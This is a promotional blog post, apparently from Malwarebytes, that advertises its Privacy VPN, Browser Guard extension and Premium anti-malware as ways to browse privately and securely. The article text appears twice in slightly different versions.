But one of the most valuable pieces of information is your browsing history, because it says a lot about what you like and where you spend your time. When it comes to getting a good look at your browsing your ISP has a window seat, and in the USA ISPs have been allowed to sell your browsing data since 2017.

The easiest and most effective ways to put a stop to that? Using a Virtual Private Network, or VPN.

VPNs create a secure, encrypted "tunnel" between your device and the VPN server, through which all of your internet traffic is routed—so if your ISP is collecting your data, it won’t be able to read it.

But not all VPNs are equal.

Some VPN providers log your data and browsing history, which means they're just another ISP that can potentially share your data with third parties. Other VPNs can slow down your Internet to a significant degree, using older encryption methods or having fewer options for servers located nearer to you.

Needless to say, choosing the wrong VPN vendor can feel like trading one poison for another. So if you're tired of dealing with both data-hungry companies and lackluster VPNs, then look no further than Malwarebytes Privacy.

*   We don’t log anything. **Ever**.
*   **Best-in-class encryption** secures your personal information.
*   **Less lag**. Browse the Internet faster with VPNs powered by WireGuard®.
*   Over 380 servers **in more than 30 countries**.
*   7-day free trial. All the premium features, no data limits!

**2\. Crushes ads, third-party trackers, and blocks malicious websites**

We ignore the many threats to web browsers at our own peril.

Legitimate sites are following us with third-party tracking code, and criminal hackers are busy making friendly sites unfriendly by injecting credit card skimmers, and trying to steal our passwords with phishing sites. One way or another, wherever you go, your personal, sensitive data is being stolen or shared with somebody using it for financial gain.

And your browser? It lets this happen without complaint.

If you think your browser comes with native abilities to block tracking scripts and other threats like phishing websites, though, you’d be half right.

Chrome has the infamously useless 'Do Not Track' setting, and anti-phishing engines exist, like Chrome Safe Browsing or Microsoft Defender SmartScreen, but they work with variable levels of success and aren't enough by themselves.

It stands to reason then that Malwarebytes Browser Guard is the ultimate browsing sidekick for quashing ads, phishing sites, and trackers.

*   **You're in charge**. We prevent third-party ad trackers from collecting information about your browsing habits.
*   **Shields up**. We intercept (and block) malicious skimming scripts your browser can execute them.
*   **Clear the clutter**. Browse up to 4x faster by blocking ads and other unwanted content.
*   Uses heuristics to **sniff out and block** unknown phishing sites.
*   Available on your preferred browser—for free!

Malwarebytes Browser Guard blocking a credit card skimming attack

**3\. Uses multiple protection layers to actively stop threats**

A key part of browsing securely online is accepting the risk that no one technology can keep out 100 percent of the threats 100 percent of the time.

To that end, it’s essential to use a strong anti-malware product that catches any threats that _do_ slip through the cracks and make it to your desktop.

But that's not all. To quote everybody's favorite ogre, security has “layers” just like onions—**your anti-malware should also have multi-layers of defense, not just one**.

Because what’s better than one layer of protection? Two.

What’s better than two? Three.

Better than that?

(Okay, you get the point.)

The fact is you don’t want to rely on any one mechanism to keep the wolves at bay, you want several.

Enter Malwarebytes Premium, offering four different layers of malware protection.

*   **Advanced web protection.** Blocks outgoing or incoming communication so malware can't receive instructions or steal your data.
*   **Malware & PUP protection**. Blocks malware, viruses, adware, potentially unwanted programs (PUPs), and other threats.
*   **Ransomware protection.** Proprietary ransomware attack prevention technology.
*   **Exploit protection.** Blocks malware which seeks to leverage bugs and vulnerabilities in your device.

**Go beyond just antivirus. Level-up your security and privacy today.**

Choosing between security and privacy shouldn’t feel like a Herculean task.

While no single method is ever 100 percent foolproof, there are some tried and true ways for keeping your data (and device) safe that, if put into practice, will guard you from most of the threats and prying eyes on the Internet.

Downloading Malwarebytes is one of those ways.

With the Malwarebytes Premium + Privacy VPN bundle, you get total protection with smart antivirus, faster, safer web browsing, and our next-gen VPN for your online privacy. Level-up your protection and upgrade to the bundle today.

Stay safe out there!

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Title: 3 ways Malwarebytes helps you browse securely and privately online

Malicious links. Third-party ad trackers. Information-gobbling data brokers. 

Let’s face it, the Internet is kind of like the Wild West when it comes to threats to our privacy and security. And unfortunately, it takes a little more than a cowboy hat and a pistol to defend yourself out there. 

That’s where Malwarebytes Premium + Privacy VPN comes in.

Whether it's blocking unwanted trackers, securing your personal information, or booting malware off your devices, here are three ways Malwarebytes can help you become the sheriff of your own digital frontier.

1.  **Let’s you browse anonymously**

It’s no secret that companies are big fans of your personal information. 

Whether it’s your name, your address, browsing history, location data, and so on—it’s all being collected, packaged up, and sold to advertisers at any given moment. Even menstrual cycle data is fair game.

One of the easiest and most effective ways to put a stop to all this snooping? Using a Virtual Private Network, or VPN. 

VPNs create a secure, encrypted "tunnel" between your device and the VPN server, through which all of your internet traffic is routed—so even if companies are collecting your data, they won’t be able to read it. That means no more  location tracking and targeted ads.

But not all VPNs are equal. 

Some VPN providers may log your data and browsing history, which means they could potentially share your data with third parties. Others can slow down your Internet to a significant degree, using older encryption methods or having fewer options for servers located nearer to you.

Needless to say, choosing the wrong VPN vendor can feel like trading one poison for another. So if you're tired of dealing with both data-hungry companies and lackluster VPNs, then look no further than Malwarebytes Privacy. 

*   We don’t log anything. Ever. 
    
*   Best-in-class encryption secures your personal information.
    
*   Less lag. Browse the Internet faster with VPNs powered by WireGuard®.
    
*   Over 380 servers in more than 30 countries.
    
*   7-day free trial. All the premium features, no data limits!
    

2.  Crushes ads, third-party trackers, and blocks malicious websites
    

We ignore the many threats native to browsers at our own peril. 

Peel back the pretty UI, and you’ll find a delicate machinery of code that threat actors and third-parties can manipulate using browser scripts.

Think of it like putting a Trojan horse into the gears of a website. Anyone can sneak an ad tracker or credit card skimmer into the browser’s back-end, right under your nose. The result is the same either way—personal, sensitive data is stolen and used for financial gain. 

If you think your browser comes with native abilities to block tracking scripts and other threats like phishing websites, though, you’d be half right. 

Chrome has the infamously useless 'Do Not Track' setting—but that’s about it. Anti-phishing engines exist, like Chrome Safe Browsing or Microsoft Defender SmartScreen—but with variable levels of success. 

It stands to reason then that Malwarebytes Browser Guard is the ultimate browsing sidekick for quashing ads, phishing sites, and trackers.

*   You're in charge. We prevent third-party ad trackers from collecting information about your browsing habits.
    
*   Shields up. We intercept (and block) malicious skimming scripts your browser can execute them.
    
*   Clear the clutter. Browse up to 4x faster by blocking ads and other unwanted content.
    
*   Uses heuristics to sniff out and block unknown phishing sites.
    
*   Available on your preferred browser—for free!
    

Malwarebytes Browser Guard blocking a credit card skimming attack

3.  Uses multiple protection layers to actively stop threats
    

A key part of browsing securely online is accepting the risk that no browser or browser extension can keep out 100% of the threats 100% of the time. 

To that end, it’s essential to use a strong anti-malware product that catches the threats that do slip through the cracks and make it to your desktop.

But that's not al. To quote everybody's favorite ogre, security has “layers” just like onions—your anti-malware should also have multi-layers of defense, not just one.

Because what’s better than one layer of protection? Two. 

What’s better than two? Three. 

Better than that? 

(Okay, you get the point.)

The fact is you don’t want to rely on any one mechanism to keep the wolves at bay, you want several. 

Enter Malwarebytes Premium, offering four different layers of malware protection.

*   Advanced web protection. Blocks outgoing or incoming communication between your computer and a malicious Internet Protocol (IP) address.
    
*   Halt hackers. Blocks malware, viruses, adware, potentially unwanted programs (PUPs), and other threats.
    
*   Intelligent defense. Proprietary ransomware attack prevention technology.
    
*   Exploit. Blocks malware which seeks to leverage bugs and vulnerabilities in your device.
    

**Go beyond just antivirus. Level-up your security and privacy today.**

Choosing between security and privacy shouldn’t feel like a Herculean task.

Tag

#chrome